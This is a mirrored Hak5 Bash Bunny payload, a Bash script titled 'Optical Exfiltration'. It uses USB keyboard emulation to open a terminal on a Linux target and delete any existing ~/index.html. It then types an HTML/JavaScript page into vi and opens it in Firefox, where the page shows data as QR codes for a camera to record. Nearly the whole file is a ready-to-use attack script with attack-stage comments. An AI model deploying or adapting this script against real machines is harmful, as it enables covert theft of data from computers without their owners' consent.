mirror of
https://github.com/hak5/bashbunny-payloads.git
synced 2025-10-29 16:58:25 +00:00
68 lines
1.5 KiB
Bash
Executable File
68 lines
1.5 KiB
Bash
Executable File
#!/bin/bash
|
|
#
|
|
# Title: Optical Exfiltration
|
|
# Author: bg-wa
|
|
# Version: 1.0
|
|
# Category: HID
|
|
# Target: *NIX
|
|
# Attackmodes: HID
|
|
# Sources: Hak5 2320, https://github.com/bg-wa/QRExtractor
|
|
#
|
|
# Quick HID only attack to write an HTML/JS file to target machine
|
|
# and open a browser, to exfiltrate data Using QR Codes and a video
|
|
# recording device.
|
|
#
|
|
# Optional html params:
|
|
# base64: Passing a base64 string to this param will auto-start processing QR Codes.
|
|
#
|
|
# playback: Passing the string "finish" to this param will auto-play the results,
|
|
# when QR codes finish rendering.
|
|
#
|
|
# Example:
|
|
# Ln65: Q STRING firefox "$target_html?playback=finish&base64=my_long_string"
|
|
#
|
|
# | Attack Stage | Description |
|
|
# | ------------------- | ---------------------------------------- |
|
|
# | SETUP | Open vi |
|
|
# | ATTACK | Writing HTML |
|
|
# | FINISH | Browser Ready/Processing |
|
|
#
|
|
|
|
ATTACKMODE HID
|
|
LED SETUP
|
|
|
|
target_html=\~\/index.html
|
|
|
|
RUN UNITY xterm
|
|
Q DELAY 1000
|
|
Q STRING rm "$target_html"
|
|
Q ENTER
|
|
Q DELAY 500
|
|
Q STRING vi "$target_html"
|
|
Q ENTER
|
|
Q DELAY 1000
|
|
Q STRING i
|
|
|
|
LED ATTACK
|
|
|
|
payload_dir=/root/udisk/payloads/$SWITCH_POSITION
|
|
source_html=$payload_dir/index.min.html
|
|
|
|
while IFS= read data
|
|
do
|
|
if [ "${data}" = " " ]
|
|
then
|
|
Q SPACE
|
|
else
|
|
Q STRING "$data"
|
|
fi
|
|
done < "$source_html"
|
|
|
|
Q ESC
|
|
Q STRING :x
|
|
Q ENTER
|
|
|
|
Q STRING firefox "$target_html"
|
|
Q ENTER
|
|
|
|
LED FINISH |